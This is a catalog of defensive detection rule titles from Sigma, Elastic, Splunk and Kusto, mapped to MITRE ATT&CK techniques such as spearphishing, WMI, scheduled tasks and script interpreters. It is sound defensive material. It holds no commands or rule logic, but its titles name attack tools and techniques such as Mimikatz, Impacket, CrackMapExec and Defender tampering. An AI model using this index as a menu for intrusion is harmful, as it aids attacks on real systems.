- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Elastic File with Suspicious Extension Downloaded production
- Sigma HTML File Opened From Download Folder experimental
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Sigma ISO File Created Within Temp Folders test
- Sigma ISO Image Mounted test
- Sigma ISO or Image Mount Indicator in Recent Files test
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Sigma Office Macro File Creation test
- Sigma Office Macro File Creation From Suspicious Process test
- Sigma Office Macro File Download test
- Sigma Password Protected ZIP File Opened (Email Attachment) test
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Elastic Potential Foxmail Exploitation production
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Elastic Potential Process Injection from Malicious Document production
- Splunk RDP File Executed from Outlook Temp Directory (Sysmon)
- Splunk RDP File Executed from Outlook Temp Directory (Windows Event Log)
- Splunk RDP File Written by Outlook (Sysmon)
- Splunk RDP File Written by Outlook (Windows Event Log)
- Elastic Remote Desktop File Opened from Suspicious Path production
- Sigma Suspicious Double Extension File Execution stable
- Elastic Suspicious Execution from INET Cache production
- Sigma Suspicious Execution From Outlook Temporary Folder test
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious File Created in Outlook Temporary Directory experimental
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious HTML File Creation production
- Sigma Suspicious HWP Sub Processes test
- Sigma Suspicious Microsoft OneNote Child Process test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Elastic Unusual Execution via Microsoft Common Console File production
- Splunk Windows CAB File on Disk production
- Splunk Windows Defender ASR Audit Events production
- Splunk Windows Defender ASR Block Events production
- Splunk Windows Defender ASR Rules Stacking production
- Splunk Windows ISO LNK File Creation production
- Splunk Windows Office Product Dropped Cab or Inf File production
- Splunk Windows Office Product Dropped Uncommon File production
- Splunk Windows Office Product Loaded MSHTML Module production
- Splunk Windows Office Product Loading Taskschd DLL production
- Splunk Windows Office Product Loading VBE7 DLL production
- Splunk Windows Office Product Spawned Child Process For Download production
- Splunk Windows Office Product Spawned Control production
- Splunk Windows Office Product Spawned MSDT production
- Splunk Windows Office Product Spawned Rundll32 With No DLL production
- Splunk Windows Office Product Spawned Uncommon Process production
- Splunk Windows Phishing PDF File Executes URL Link production
- Splunk Windows Phishing Recent ISO Exec Registry production
- Sigma Windows Registry Trust Record Modification test
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Splunk Windows Spearphishing Attachment Connect To None MS Office Domain production
- Splunk Windows Spearphishing Attachment Onenote Spawn Mshta production
- Splunk Windows Universal Data Link File Creation production
Phishing: Spearphishing Link T1566.002 18 rules
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
- Elastic Execution of File Written or Modified by Microsoft Office production
- Elastic File with Suspicious Extension Downloaded production
- Kusto Office ASR rule triggered from browser spawned office process. available
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Remote File Execution via MSIEXEC production
- Splunk Process Creating LNK file in Suspicious Location production
- Elastic Remote XSL Script Execution via COM production
- Elastic Suspicious Explorer Child Process production
- Elastic Suspicious HTML File Creation production
- Kusto Suspicious parentprocess relationship - Office child processes. available
- Kusto T1566.002 Spearphishing Link - Rare URL Clicks
- Elastic Unusual Execution via Microsoft Common Console File production
- Splunk Windows Defender ASR Audit Events production
- Splunk Windows Defender ASR Block Events production
- Splunk Windows Defender ASR Rules Stacking production
Execution
Windows Management Instrumentation T1047 108 rules
- Sigma Application Removed Via Wmic.EXE test
- Sigma Application Terminated Via Wmic.EXE test
- Sigma Blue Mockingbird test
- Sigma Blue Mockingbird - Registry test
- Sigma Computer System Reconnaissance Via Wmic.EXE test
- Elastic Delayed Execution via Ping production
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Potential Impacket Lateral Movement Activity stable
- Sigma Hardware Model Reconnaissance Via Wmic.EXE test
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- YARA-L Impacket WMIExec CISA Report
- Sigma Impacket WMIexec process execution experimental
- Splunk Impacket_Empire's WMIExec (Windows Event Log)
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Mofcomp Activity production
- Sigma New Process Created Via Wmic.EXE test
- Sigma Password Set to Never Expire via WMI experimental
- Elastic Persistence via WMI Event Subscription production
- Elastic Persistence via WMI Standard Registry Provider production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential Maze Ransomware Activity test
- Sigma Potential Product Class Reconnaissance Via Wmic.EXE test
- Sigma Potential Product Reconnaissance Via Wmic.EXE test
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Potential Unquoted Service Path Reconnaissance Via Wmic.EXE test
- Sigma Potential Windows Defender Tampering Via Wmic.EXE test
- Sigma Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell stable
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerShell Invoke CIMMethod CIMSession production
- Splunk PowerShell Invoke WmiExec Usage production
- Splunk Process Execution via WMI production
- Sigma Process Reconnaissance Via Wmic.EXE test
- Sigma PSExec and WMI Process Creations Block test
- Sigma RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class experimental
- Sigma Registry Manipulation via WMI Stdregprov experimental
- Splunk Remote Process Instantiation via WMI production
- Splunk Remote Process Instantiation via WMI and PowerShell production
- Splunk Remote Process Instantiation via WMI and PowerShell Script Block production
- Splunk Remote WMI Command Attempt production
- Splunk Remote WMIC Query (PowerShell)
- Splunk Remote WMIC Query (Windows Event Log)
- Sigma Script Event Consumer Spawning Process test
- Splunk Script Execution via WMI production
- Elastic Security Software Discovery using WMIC production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service Reconnaissance Via Wmic.EXE test
- Sigma Service Started/Stopped Via Wmic.EXE test
- Sigma Service Startup Type Change Via Wmic.EXE experimental
- Sigma Successful Account Login Via WMI stable
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Elastic Suspicious Cmd Execution via WMI production
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Elastic Suspicious Execution from a Mounted Device production
- Sigma Suspicious HH.EXE Execution test
- Sigma Suspicious Microsoft Office Child Process test
- Sigma Suspicious Process Created Via Wmic.EXE test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious WMIC Execution Via Office Process test
- Elastic Suspicious WMIC XSL Script Execution production
- Sigma Suspicious WmiPrvSE Child Process test
- Sigma System Disk And Volume Reconnaissance Via Wmic.EXE test
- Splunk System Enumeration with WMIC (Sysmon)
- Splunk System Enumeration with WMIC (Windows Event Log)
- Sigma T1047 Wmiprvse Wbemcomn DLL Hijack test
- Sigma UNC2452 PowerShell Pattern test
- Elastic Volume Shadow Copy Deletion via PowerShell production
- Elastic Volume Shadow Copy Deletion via WMIC production
- Sigma Windows Hotfix Updates Reconnaissance Via Wmic.EXE test
- Elastic Windows Script Interpreter Executing Process via WMI production
- Elastic Windows System Information Discovery production
- Splunk Windows WinRAR Launched Outside Default Installation Directory production
- Splunk Windows WMI Impersonate Token production
- Splunk Windows WMI Process And Service List production
- Splunk Windows WMI Process Call Create production
- Splunk Windows WMI Reconnaissance Class Query production
- Splunk WinRM Tools (PowerShell)
- Splunk WinRM Tools (Sysmon)
- Splunk WinRM Tools (Windows Event Log)
- Sigma WMI Event Consumer Created Named Pipe test
- Elastic WMI Incoming Lateral Movement production
- Sigma WMI Module Loaded By Uncommon Process test
- Sigma WMI spwaning PowerShell process - WMImplant experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
- Elastic WMI WBEMTEST Utility Execution production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
- Splunk WMIC Host Reconniassance (PowerShell)
- Splunk WMIC Host Reconniassance (Sysmon)
- Splunk WMIC Host Reconniassance (Windows Event Log)
- Elastic WMIC Remote Command production
- Sigma WMIC Remote Command Execution test
- Sigma WMIC Unquoted Services Path Lookup - PowerShell test
- Sigma Wmiexec Default Output File test
- Sigma WMImplant Hack Tool test
- Splunk Wmiprvse LOLBAS Execution Process Spawn production
- Sigma WmiPrvSE Spawned A Process stable
- Splunk WmiPrvSE Suspicious Child Process (Sysmon)
- Splunk WmiPrvSE Suspicious Child Process (Windows Event Log)
- Sigma Wmiprvse Wbemcomn DLL Hijack test
- Sigma Wmiprvse Wbemcomn DLL Hijack - File test
- Sigma XSL Script Execution Via WMIC.EXE test
Scheduled Task/Job T1053 133 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Kusto AV detections related to Tarrask malware available
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Defrag Deactivation - Security test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - SharPersist Execution test
- Sigma HAFNIUM Exchange Exploitation Activity test
- Splunk Hidden Scheduled Task Created - Windows (Windows Event Log)
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive AT Job test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Splunk Schedule Task with HTTP Command Arguments production
- Splunk Schedule Task with Rundll32 Command Trigger production
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (PowerShell)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Sysmon)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Windows Event Log)
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Elastic Scheduled Tasks AT Command Enabled production
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks Run Task On Demand production
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Scheduled Task Write to System32 Tasks test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows Hidden Schedule Task Settings production
- Splunk Windows Level RMM Watchdog Task Created production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task DLL Module Loaded production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Scheduled Tasks for CompMgmtLauncher or Eventvwr production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Scheduled Task/Job: At T1053.002 5 rules
- Elastic At.exe Command Lateral Movement production
- Sigma Interactive AT Job test
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Elastic Scheduled Tasks AT Command Enabled production
Scheduled Task/Job: Scheduled Task T1053.005 111 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Command and Scripting Interpreter T1059 732 rules
- Splunk 1 or 2 Character Executable (Windows Event Log)
- Sigma Abusable DLL Potential Sideloading From Suspicious Location test
- Sigma Add Insecure Download Source To Winget test
- Sigma Add New Download Source To Winget test
- Sigma Add Potential Suspicious New Download Source To Winget test
- Sigma Adwind RAT / JRAT test
- Sigma Adwind RAT / JRAT File Artifact test
- Sigma Alternate PowerShell Hosts - PowerShell Module test
- Sigma Alternate PowerShell Hosts Pipe test
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Atlassian Confluence CVE-2022-26134 test
- Sigma Atomic MacOS Stealer - FileGrabber Activity experimental
- Elastic Attempt to Install or Run Kali Linux via WSL production
- Splunk AutoHotkey Execution (PowerShell)
- Splunk AutoHotkey Execution (Sysmon)
- Splunk AutoHotkey Execution (Windows Event Log)
- Splunk AutoIt Execution (PowerShell)
- Splunk AutoIt Execution (Sysmon)
- Splunk AutoIt Execution (Windows Event Log)
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Sigma Bad Opsec Powershell Code Artifacts test
- Sigma Base64 Encoded PowerShell Command Detected test
- YARA-L Base64 Encoded PowerShell Command Detected
- Kusto Base64 encoded Windows process command-lines available
- Kusto Base64 encoded Windows process command-lines (Normalized Process Events)
- Elastic Binary Content Copy via Cmd.exe production
- Sigma BloodHound Collection Files test
- Sigma bXOR Operator Usage In PowerShell Command Line - PowerShell Classic test
- Splunk Bypass or Unrestricted PowerShell Execution (PowerShell)
- Sigma Certificate Exported Via PowerShell test
- Sigma Change PowerShell Policies to an Insecure Level test
- Sigma Change PowerShell Policies to an Insecure Level - PowerShell test
- Sigma ChromeLoader Malware Execution test
- Elastic Clearing Windows Console History production
- Sigma Clfs.SYS Loaded By Process Located In a Potential Suspicious Location experimental
- Splunk CMD Carry Out String Command Parameter production
- Splunk CMD Echo Pipe - Escalation production
- Splunk CMD execution with _c (PowerShell)
- Splunk CMD execution with _c (Sysmon)
- Splunk CMD execution with _c (Windows Event Log)
- Sigma Cmd.EXE Missing Space Characters Execution Anomaly test
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Elastic Command Execution via SolarWinds Process production
- Splunk Command Line .cmd Execution (Sysmon)
- Splunk Command Line .cmd Execution (Windows Event Log)
- Sigma Command Line Execution with Suspicious URL and AppData Strings test
- Splunk Command Line Spawned by Archive Utility - Windows (Sysmon)
- Splunk Command Line Spawned by Archive Utility - Windows (Windows Event Log)
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Splunk Command Output Redirected to Localhost (Windows Event Log)
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Command-Line Interface Execution (PowerShell)
- Splunk Command-Line Interface Execution (Sysmon)
- Splunk Command-Line Interface Execution (Windows Event Log)
- Splunk Common Exchange Recon cmdlets (PowerShell)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Elastic Conhost Spawned By Suspicious Parent Process production
- Sigma Conhost Spawned By Uncommon Parent Process test
- Sigma Conhost.exe CommandLine Path Traversal test
- Splunk Conhost.exe Kernel call (Sysmon)
- Splunk Conhost.exe Kernel call (Windows Event Log)
- Splunk Consent.exe Suspicious Child Process (Sysmon)
- Splunk Consent.exe Suspicious Child Process (Windows Event Log)
- Sigma ConvertTo-SecureString Cmdlet Usage Via CommandLine test
- YARA-L ConvertTo-SecureString Cmdlet Usage Via CommandLine
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Cscript/Wscript Uncommon Script Extension Execution test
- Sigma CVE-2022-24527 Microsoft Connected Cache LPE test
- Sigma CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) test
- Sigma CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) test
- Sigma DarkGate - Autoit3.EXE Execution Parameters test
- Sigma DarkGate - Autoit3.EXE File Creation By Uncommon Process test
- Sigma DarkGate - Drop DarkGate Loader In C:\Temp Directory test
- Kusto Deimos Component Execution available
- Elastic Delayed Execution via Ping production
- Splunk Detect Certify With PowerShell Script Block Logging production
- Splunk Detect Empire with PowerShell Script Block Logging production
- Splunk Detect Mimikatz With PowerShell Script Block Logging production
- Splunk Detect Prohibited Applications Spawning cmd exe production
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Splunk Detect Use of cmd exe to Launch Script Interpreters production
- Sigma Detection of PowerShell Execution via Sqlps.exe test
- Elastic Disabling Windows Defender Security Settings via PowerShell production
- Sigma DNS Query by Finger Utility experimental
- Kusto Doppelpaymer Stop Services available
- Sigma DSInternals Suspicious PowerShell Cmdlets test
- Sigma DSInternals Suspicious PowerShell Cmdlets - ScriptBlock test
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Sigma Elevated System Shell Spawned test
- Sigma Elevated System Shell Spawned From Uncommon Parent Location test
- Sigma Elise Backdoor Activity test
- Sigma Emotet Loader Execution Via .LNK File test
- Splunk Encoded Powershell Command (PowerShell)
- Splunk Encoded Powershell Command (Sysmon)
- Splunk Encoded Powershell Command (Windows Event Log)
- Sigma Encoded PowerShell payload deployed (PowerShell) experimental
- Sigma Encoded PowerShell payload deployed via process execution experimental
- Splunk Excessive distinct processes from Windows Temp production
- Splunk Excessive number of taskhost processes production
- Splunk Exchange PowerShell Module Usage production
- Sigma Exchange PowerShell Snap-Ins Usage test
- Kusto Exchange Worker Process Making Remote Call
- Splunk Executable Create Script Process (PowerShell)
- Splunk Executable Create Script Process (Sysmon)
- Splunk Executable Create Script Process (Windows Event Log)
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Sigma Execute Code with Pester.bat test
- Sigma Execute Code with Pester.bat as Parent test
- Splunk Execute Javascript With Jscript COM CLSID production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of Persistent Suspicious Program production
- Sigma Execution of Powershell Script in Public Folder test
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Elastic Execution via Windows Subsystem for Linux production
- Sigma Exploited CVE-2020-10189 Zoho ManageEngine test
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Splunk Explorer Child Process with Suspicious Command Line Padding (Sysmon)
- Elastic Exporting Exchange Mailbox via PowerShell production
- Sigma FakeUpdates/SocGholish Activity test
- Sigma Forfiles Command Execution test
- Splunk Get-ForestTrust with PowerShell Script Block production
- Splunk GetLocalUser with PowerShell Script Block production
- Splunk GetWmiObject User Account with PowerShell Script Block production
- Splunk Git Hooks Spawn System32 Process (Sysmon)
- Splunk Git Spawns System32 Process (Sysmon)
- Splunk Git Spawns System32 Process (Windows Event Log)
- Splunk Go Run Execution (PowerShell)
- Splunk Go Run Execution (Sysmon)
- Splunk Go Run Execution (Windows Event Log)
- Kusto Google Threat Intelligence - Threat Hunting Hash
- Sigma Greenbug Espionage Group Indicators test
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - Covenant PowerShell Launcher test
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - CrackMapExec PowerShell Obfuscation test
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - Empire PowerShell Launch Parameters test
